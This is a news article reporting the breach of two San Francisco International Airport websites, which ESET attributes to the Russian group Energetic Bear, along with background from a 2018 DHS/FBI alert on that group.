
Data Breach of Two San Francisco International Airport (SFO) Websites Linked to Russian Hackers
Last month two websites, SFOConnect.com and SFOConstruction.com, belonging to San Francisco International Airport (SFO) were hacked. The San Francisco airport data breach is now being pinned on hackers who are believed to be working for the Russian government according to cyber security researchers at ESET.
A data breach notice posted on both website states that the attackers “inserted malicious computer code on these websites to steal some users’ login credentials.” The malware has been removed from both sites. SFO Airport officials forced users to reset their passwords on all airport email accounts and network passwords. Anyone who has accessed either website should change their username and password.
ESET says a Russian Advanced Persistent Threat (APT) Group known as Energetic Bear, Crouching Yeti, and Energetic Bear is behind a hack of two of the airport’s websites. One of the breached websites, SFOConnect.com, a website is used by airport employees. The second websites attacked, SFOConstruction.com, is a web portal used by SFO airport construction contractors. Both websites were compromised when hackers deployed malware to steal login credentials from website visitors. According to the airport report, the goal of the attack was to steal website login credentials. But according to ESET, the goal of the attack was to steal Windows login credentials from website visitors.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the ESET research team said.
The data breach is believed to be the work of a state-sponsored hacking group called Energetic Bear which works at the behest of the Russian government. There is no connection to Magecart malware used to steal credentials from ecommerce websites.
DHS and FBI Alert on Russian Hackers
In 2018, the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issued a joint technical alert warning of cyberthreats from Energetic Bear. The cyberattacks targeted targeting U.S. Government entities as well as critical infrastructure organizations in the energy, nuclear, commercial facilities, water, aviation, and manufacturing sectors since at least 2016. The hackers focus primarily on organization in the Middle East, Turkey, and the United States. The alert reports that the hackers use malware and spear phishing emails to obtain remote access into IT networks. After gaining access, the hackers conducted network reconnaissance, gathered credentials , moved laterally through networks, and collected data on Industrial Control Systems (ICS).